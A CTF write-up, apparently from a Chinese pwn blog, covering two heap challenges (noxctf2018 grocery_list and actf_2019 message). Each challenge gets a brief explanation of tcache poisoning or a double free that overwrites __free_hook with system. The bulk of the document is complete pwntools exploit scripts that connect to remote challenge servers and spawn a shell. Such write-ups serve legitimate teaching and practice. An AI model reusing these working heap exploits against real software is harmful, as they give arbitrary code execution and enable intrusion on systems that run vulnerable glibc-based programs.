noxctf2018_grocery_list
先觀察各個功能函數，發現其中一個會泄露棧地址；接著利用 tcache attack（篡改已釋放 chunk 的 fd）把 chunk 分配到棧上，讀出 __libc_start_main 的返回地址算出 libcbase；最後再次用 tcache attack 把 chunk 分配到 __free_hook，寫入 system 後釋放存有 "/bin/sh" 的 chunk 即可拿到 shell。
exp:
#!/usr/bin/python2
from pwn import *
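# Local debugging target; swap in for `remote(...)` when testing offline.
# p = process('./GroceryList')
p = remote('node3.buuoj.cn', 26988)
elf = ELF('./GroceryList')
# NOTE(review): elf.libc resolves the *local* libc that the loader would use
# for this binary, not the one on the remote box.  Every libc offset below
# (__libc_start_main, __free_hook, system) comes from it, so the exploit only
# works when local and remote builds match; otherwise load the challenge's
# libc explicitly with ELF('<path-to-libc>').
libc = elf.libc


def sda(data, data1):
    """Wait for the prompt `data`, then send `data1` followed by a newline.

    Returns whatever pwntools' sendlineafter returns (the data received up to
    the prompt), same as the lambda it replaces.
    """
    return p.sendlineafter(data, data1)


def rec(data):
    """Receive from the target up to and including `data`."""
    return p.recvuntil(data)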
def show():
    """Pick menu option 1 (show); the caller parses whatever gets printed."""
    choice = '1'
    sda('Exit', choice)
def add(sele, name):
    """Menu option 2: create an entry of kind `sele` and send `name` for it.

    `sele` is converted with str() so ints are accepted; `name` is sent as-is.
    """
    dialogue = (
        ('Exit', '2'),
        ('?', str(sele)),
        (':', name),
    )
    for prompt, answer in dialogue:
        sda(prompt, answer)
def empadd(sele, man):
    """Menu option 3 (the author's "empty add"): answer `sele`, then `man`.

    NOTE(review): what the two prompts select is not visible from this file;
    the exploit uses it for the allocation that is served from the stack,
    presumably because this path writes no user data into the chunk -- confirm
    against the binary.
    """
    answers = ('3', str(sele), str(man))
    prompts = ('Exit', '?', '?')
    for prompt, answer in zip(prompts, answers):
        sda(prompt, answer)
def delete(idx):
    """Menu option 4: free entry number `idx`."""
    index = str(idx)
    sda('Exit', '4')
    sda('?', index)
def edit(idx, name):
    """Menu option 5: overwrite entry `idx` with `name`.

    The exploit relies on this write running past the entry into the
    neighbouring chunk, so `name` is sent unmodified.
    """
    dialogue = (
        ('Exit', '5'),
        ('?', str(idx)),
        (':', name),
    )
    for prompt, answer in dialogue:
        sda(prompt, answer)
def Tadd():
    """Menu option 6 (the author's "Tadd"); takes no further input."""
    choice = '6'
    sda('Exit', choice)
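# ---- stage 1: leak a stack address ---------------------------------------
add(2, '\x11' * 4)      # index 0
add(2, '\x12' * 4)      # index 1
Tadd()                  # index 2
add(2, '\x09' * 9)      # index 3


def _recv_ptr():
    """Return the next leaked user-space pointer as an int.

    x86-64 user-space addresses typically have 0x7f as their top used byte,
    so read up to that byte, keep the six bytes ending there and zero-extend
    them to a full qword.  Both leaks below go through this so they are
    parsed identically (the original used two different spellings).
    """
    return u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))


show()
# The listing includes a stack pointer; -11 is the author's fixed distance
# from the leaked value to the stack slot targeted below.  NOTE(review): this
# was chosen empirically -- re-derive it if the binary or environment changes.
stack_addr = _recv_ptr() - 11
log.success('stack_addr: ' + hex(stack_addr))

# ---- stage 2: tcache poisoning onto the stack to read a libc pointer ------
delete(3)
# Written through entry 2 and presumably running into the freed entry 3:
# 0x41 is that chunk's size field, the following qword its tcache `next`
# pointer, now aimed at the stack.
payload = p64(0) * 3 + p64(0x41) + p64(stack_addr)
edit(2, payload)
add(2, 'doudou')        # pops entry 3's chunk; stack_addr is now the bin head
empadd(2, 1)            # the next same-size allocation is served at stack_addr
show()
# The qword read from the stack is a return address into __libc_start_main.
# 231 is the distance from that symbol in the libc the target runs; it is
# build-specific, so verify it against the target's libc before relying on it.
libcbase = _recv_ptr() - 231 - libc.sym['__libc_start_main']
log.success('libcbase: ' + hex(libcbase))
free_hook = libcbase + libc.sym['__free_hook']
system = libcbase + libc.sym['system']

# ---- stage 3: tcache poisoning again, this time onto __free_hook ---------
add(3, 'doudou')        # index 5 (inferred from the delete(5) that follows)
delete(5)
# Same trick through entry 3 into the freed entry 5: 0x71 restores its size
# field, the next qword points its tcache `next` at __free_hook.
payload = p64(0) * 7 + p64(0x71) + p64(free_hook)
edit(3, payload)
add(3, '/bin/sh\x00')   # pops entry 5's chunk and fills it with system()'s argument
add(3, p64(system))     # served from __free_hook itself: overwrite it with system
delete(5)               # free("/bin/sh") now runs system("/bin/sh")
p.interactive()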
actf_2019_message
沒開 PIE，全局地址固定：利用 double free（tcache dup）把 chunk 分配到 0x602060（推測是存放 message 指針的全局數組），再通過 show 泄露 unsorted bin 中的 fd 得到 libcbase；然後再次 double free 把 chunk 分配到 __free_hook，寫入 system 並釋放存有 "/bin/sh" 的 chunk 拿到 shell。
exp:
from pwn import *
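# Local debugging target; swap in for `remote(...)` when testing offline.
# p = process('./ACTF_2019_message')
p = remote('node3.buuoj.cn', 26585)
elf = ELF('./ACTF_2019_message')
# NOTE(review): elf.libc is the *local* libc the loader would pick for this
# binary, not the remote one.  The __malloc_hook/__free_hook/system offsets
# used in exp() come from it, so local and remote builds must match; load
# the challenge's libc with ELF('<path-to-libc>') otherwise.
libc = elf.libc


def sd(data):
    """Send `data` to the target verbatim (no newline appended)."""
    return p.send(data)


def sda(data, data2):
    """Wait for the prompt `data`, then send `data2` followed by a newline.

    Returns what pwntools' sendlineafter returns, same as the lambda it
    replaces.
    """
    return p.sendlineafter(data, data2)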
def add(size, content):
    """Menu option 1: allocate a message of `size` bytes, then send `content`.

    `content` goes out through p.sendafter rather than sendlineafter so no
    newline is appended -- payloads carrying packed pointers must be delivered
    byte-exact.
    """
    sda(': ', '1')
    sda(':', str(size))
    p.sendafter(':', content)
def delete(idx):
    """Menu option 2: free message `idx`.

    exp() calls this twice on the same index, which only helps if the binary
    leaves the pointer in place after freeing -- NOTE(review): confirm.
    """
    index = str(idx)
    sda(': ', '2')
    sda(':', index)
def edit(idx, content):
    """Menu option 3: overwrite message `idx` with `content`.

    Like add(), the body is sent with p.sendafter so it is not newline-
    terminated.  Not used by exp() as written.
    """
    index = str(idx)
    sda(': ', '3')
    sda(':', index)
    p.sendafter(':', content)
def show(idx):
    """Menu option 4: print message `idx`; the caller parses the output."""
    dialogue = ((': ', '4'), (':', str(idx)))
    for prompt, answer in dialogue:
        sda(prompt, answer)
def exp():
    """Run the exploit against `p`.

    Leaks libc through a chunk that is double-freed into tcache, then uses a
    second double free to allocate on __free_hook, overwrite it with system and
    free a message holding "/bin/sh".  Uses the module-level p, libc and the
    add/delete/show helpers.
    """
    # --- heap layout -------------------------------------------------------
    add(0x68,'\x09'*9)  # index 0
    add(0x450,'\x08'*8)  # index 1: big enough to skip tcache when freed
    add(0x68,'/bin/sh\x00')  # index 2: argument for the final system() call
    add(0x58,'\x07'*7)  # index 3
    # --- double free -> controlled `next` pointer in the 0x68 tcache bin -----
    # Freeing index 0 twice works here, so the binary evidently keeps the
    # pointer after free and this libc's tcache has no double-free detection
    # (NOTE(review): confirm the glibc version on the target).
    delete(0)
    delete(0)
    delete(1)  # 0x460 chunk: too large for tcache, goes to the unsorted bin
    # First pop of the duplicated chunk writes its tcache `next`; 0x602060 is
    # a fixed address because the binary has no PIE (presumably the global
    # message table -- confirm against the binary).
    add(0x68,p64(0x000602060))
    add(0x68,'doudou')  # second pop; 0x602060 is now at the head of the bin
    # Third pop is served at 0x602060: two zero qwords then 0x460, presumably
    # fixing up entry 1's bookkeeping so show(1) prints its freed chunk.
    add(0x68,p64(0)*2+p64(0x460))
    show(1)
    # The freed unsorted chunk's fd points at the unsorted-bin head inside
    # main_arena (main_arena+96), and on x86-64 glibc main_arena lies 0x10 past
    # __malloc_hook.  Both are layout assumptions -- verify for the target libc.
    libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['__malloc_hook']-0x10-96
    log.success('libcbase: '+hex(libcbase))
    system=libcbase+libc.sym['system']
    free_hook=libcbase+libc.sym['__free_hook']
    # --- second double free -> allocation on __free_hook ---------------------
    delete(3)
    delete(3)
    add(0x58,p64(free_hook))  # poison `next` with __free_hook
    add(0x58,'doudou')  # pop the duplicate again
    add(0x58,p64(system))  # this allocation is __free_hook itself: write system
    delete(2)  # free("/bin/sh") -> system("/bin/sh")
    #show(2)
    p.interactive()
if __name__ == '__main__':
    # Only run the exploit when executed as a script, not on import.
    exp()